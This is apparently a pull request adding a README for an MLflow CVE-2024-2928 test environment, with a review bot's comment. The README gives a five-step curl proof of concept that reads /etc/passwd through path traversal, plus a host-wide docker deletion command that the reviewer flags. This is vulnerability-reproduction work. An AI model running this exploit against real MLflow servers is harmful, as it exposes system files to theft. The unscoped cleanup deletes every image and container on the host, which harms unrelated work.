Add CVE-2024-2928 Environment #83

Open
wants to merge 2 commits into
base: main
43 changes: 43 additions & 0 deletions mlflow/CVE-2024-2928/README.md
@@ -0,0 +1,43 @@
# MLflow CVE-2024-2928

This directory contains the deployment config for MLflow instances vulnerable and fixed to CVE-2024-2928. MLflow versions below 2.11.2 are vulnerable to that arbitrary file read vulnerability.

## How to Trigger the Vulnerability?

To trigger the vulnerability, you can use the following five curl commands. In a vulnerable environment, after the final curl request, you can see the /etc/passwd file content in the response.
```
# Create a malicious experiment:
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "artifact_location": "http:///#/../../../../../../../../../../../../../../etc/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/experiments/create'

# Associate a run to it (EXPERIMENT_ID is coming from the first curl request's response):
curl -X POST -H 'Content-Type: application/json' -d '{"experiment_id": "EXPERIMENT_ID"}' 'http://127.0.0.1:5000/api/2.0/mlflow/runs/create'

# Create a registered model:
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create'

# Link a model version to the malicious run (RUN_ID is coming from the second curl request's response. It is below the lifecycle_stage key in the JSON response):
curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "run_id": "RUN_ID", "source": "file:///etc/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create'

# Read /etc/passwd:
curl 'http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=poc&version=1'
```

In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them.

```
sudo docker rmi -f $(sudo docker images -aq)
sudo docker remove $(sudo docker ps -a -q)
```
## Fixed version
```
docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.11.3 mlflow server --host 0.0.0.0 --port 5000
```

The deployed service listens on `localhost:5000` after the docker completes its job.

## Vulnerable version
```
docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.9.2 mlflow server --host 0.0.0.0 --port 5000
```

The deployed service listens on `localhost:5000` after the docker completes its job.
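Review bot: the cleanup block under "In case you cannot trigger the vulnerability" is host-wide and destructive: `sudo docker rmi -f $(sudo docker images -aq)` deletes every image on the machine and `sudo docker remove $(sudo docker ps -a -q)` every container, not just the two MLflow ones, and the two commands are in the wrong order (containers have to go before their images, otherwise `rmi -f` fails for any image that still has a running container). Suggest scoping it to this environment, e.g. `sudo docker rm -f $(sudo docker ps -aq --filter ancestor=ghcr.io/mlflow/mlflow:v2.9.2)` followed by `sudo docker rmi ghcr.io/mlflow/mlflow:v2.9.2`, and stating which image the stale-cache problem is meant to affect. Two smaller points in the same hunk: the run-creation step posts to `/api/2.0/mlflow/runs/create` while every other request uses the `/ajax-api/2.0/mlflow/...` prefix, so if the mix is not deliberate, use one prefix consistently; and the opening sentence reads "vulnerable and fixed to CVE-2024-2928", which would be clearer as "vulnerable to, and fixed for, CVE-2024-2928", while "after the docker completes its job" in both deployment sections would read better as "once the container has started".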